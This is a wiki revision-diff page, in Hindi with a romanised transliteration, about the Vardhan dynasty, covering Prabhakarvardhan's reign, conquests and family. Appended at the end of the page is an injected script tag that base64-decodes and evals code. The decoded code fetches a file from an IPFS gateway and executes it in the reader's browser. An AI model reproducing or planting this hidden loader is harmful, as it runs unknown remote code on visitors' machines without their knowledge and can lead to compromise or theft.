Difference between revisions of "वर्धन वंश"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " मे " to " में ")
 
(6 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*ई. छठी शती के प्रारम्भ में पु्ष्यभूति ने [[पुष्यभूति वंश]] [[थानेश्वर]] में एक नये राजवंश की नींव डाली।  
+
'''वर्धन वंश''' की नींव छठी शती के प्रारम्भ में [[पुष्यभूतिवर्धन]] ने [[थानेश्वर]] में डाली। इस वंश का पाँचवा और शक्तिशाली राजा [[प्रभाकरवर्धन|प्रभाकरनवर्धन]] (लगभग 583 - 605 ई.) हुआ था। उसकी उपाधि 'परम भट्टारक महाराजाधिराज' थी। उपाधि से ज्ञात होता है कि प्रभाकरवर्धन ने अपना स्वतन्त्र राज्य स्थापित कर लिया था।
*इस वंश का पाँचवा और शक्तिशाली राजा [[प्रभाकरवर्धन|प्रभाकरनवर्धन]] (लगभग 583 - 605 ई.) हुआ।
+
 
*उसकी उपाधि 'परम भट्टारक महाराजाधिराज' थी। उपाधि से ज्ञात होता है कि प्रभाकरवर्धन ने अपना स्वतन्त्र राज्य स्थापित कर लिया था।  
+
*[[बाणभट्ट]] द्वारा रचित '[[हर्षचरित]]' से पता चलता है कि इस शासक ने [[सिंध प्रांत|सिंध]], [[गुजरात]] और [[मालवा]] पर अधिकार कर लिया था।  
*[[बाणभट्ट]] द्वारा रचित 'हर्षचरित' से पता चलता है कि इस शासक ने [[सिंध प्रांत|सिंध]], [[गुजरात]] और [[मालवा]] पर अधिकार कर लिया था।  
+
*[[गांधार]] प्रदेश तक के शासक प्रभाकरवर्धन से डरते थे तथा उसने [[हूण|हूणों]] को भी पराजित किया था।  
*[[गांधार]] प्रदेश तक के शासक प्रभाकरवर्धन से डरते थे तथा उसने हूणों को भी पराजित किया था।  
+
*राजा प्रभाकरवर्धन के दो पुत्र [[राज्यवर्धन]], [[हर्षवर्धन]] और एक पुत्री [[राज्यश्री]] थी।  
*राजा प्रभाकरवर्धन के दो पुत्र राज्यवर्धन, हर्षवर्धन और एक पुत्री राज्यश्री थी।  
+
*राज्यश्री का [[विवाह]] [[कन्नौज]] के [[मौखरि वंश|मौखरी वंश]] के शासक [[गृहवर्मन]] से हुआ था। उस वैवाहिक संबंध के कारण उत्तरी [[भारत]] के दो प्रसिद्ध मौखरी और वर्धन राज्य प्रेम-सूत्र में बँध गये थे, जिससे उन दोनों की शक्ति बहुत बढ़ गई थी।
*राज्यश्री का विवाह [[कन्नौज]] के [[मौखरि वंश|मौखरी वंश]] के शासक ग्रहवर्मन से हुआ था। उस वैवाहिक संबंध के कारण उत्तरी [[भारत]] के दो प्रसिद्ध मौखरी और वर्धन राज्य प्रेम-सूत्र में बँध गये थे, जिससे उन दोनों की शक्ति बहुत बढ़ गई थी।
+
*'हर्षचरित' से ज्ञात होता है कि प्रभाकरवर्धन ने अपनी मृत्यु से पहले राज्यवर्धन को उत्तर दिशा में हूणों का दमन करने के लिए भेजा था। संभवत: उस समय हूणों का अधिकार उत्तरी [[पंजाब]] और [[कश्मीर]] के कुछ भाग पर ही था।  
*हर्षचरित से ज्ञात होता है कि प्रभाकरवर्धन ने अपनी मृत्यु से पहले राज्यवर्धन को उत्तर दिशा में हूणों का दमन करने के लिए भेजा था। संभवत: उस समय हूणों का अधिकार उत्तरी [[पंजाब]] और [[कश्मीर]] के कुछ भाग पर ही था।  
 
 
*शक्तिशाली प्रभाकरवर्धन का शासन पश्चिम में [[व्यास नदी]] से लेकर पूर्व में [[यमुना नदी|यमुना]] तक था।  
 
*शक्तिशाली प्रभाकरवर्धन का शासन पश्चिम में [[व्यास नदी]] से लेकर पूर्व में [[यमुना नदी|यमुना]] तक था।  
  
 
+
{{लेख प्रगति |आधार=|प्रारम्भिक= प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध=}}
 
 
 
==संबंधित लेख==
 
==संबंधित लेख==
{{भारत के राजवंश}}
+
{{वर्धन साम्राज्य}}{{भारत_के_राजवंश}}
[[Category:इतिहास_कोश]][[Category:भारत_के_राजवंश]][[Category:वर्धन_साम्राज्य]]__INDEX__
+
[[Category:इतिहास_कोश]][[Category:भारत_के_राजवंश]][[Category:वर्धन_साम्राज्य]]
 +
__INDEX__

Latest revision as of 11:11, 7 September 2014

vardhan vansh ki nianv chhathi shati ke prarambh mean pushyabhootivardhan ne thaneshvar mean dali. is vansh ka paanchava aur shaktishali raja prabhakaranavardhan (lagabhag 583 - 605 ee.) hua tha. usaki upadhi 'param bhattarak maharajadhiraj' thi. upadhi se jnat hota hai ki prabhakaravardhan ne apana svatantr rajy sthapit kar liya tha.

  • banabhatt dvara rachit 'harshacharit' se pata chalata hai ki is shasak ne siandh, gujarat aur malava par adhikar kar liya tha.
  • gaandhar pradesh tak ke shasak prabhakaravardhan se darate the tatha usane hoonoan ko bhi parajit kiya tha.
  • raja prabhakaravardhan ke do putr rajyavardhan, harshavardhan aur ek putri rajyashri thi.
  • rajyashri ka vivah kannauj ke maukhari vansh ke shasak grihavarman se hua tha. us vaivahik sanbandh ke karan uttari bharat ke do prasiddh maukhari aur vardhan rajy prem-sootr mean bandh gaye the, jisase un donoan ki shakti bahut badh gee thi.
  • 'harshacharit' se jnat hota hai ki prabhakaravardhan ne apani mrityu se pahale rajyavardhan ko uttar disha mean hoonoan ka daman karane ke lie bheja tha. sanbhavat: us samay hoonoan ka adhikar uttari panjab aur kashmir ke kuchh bhag par hi tha.
  • shaktishali prabhakaravardhan ka shasan pashchim mean vyas nadi se lekar poorv mean yamuna tak tha.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>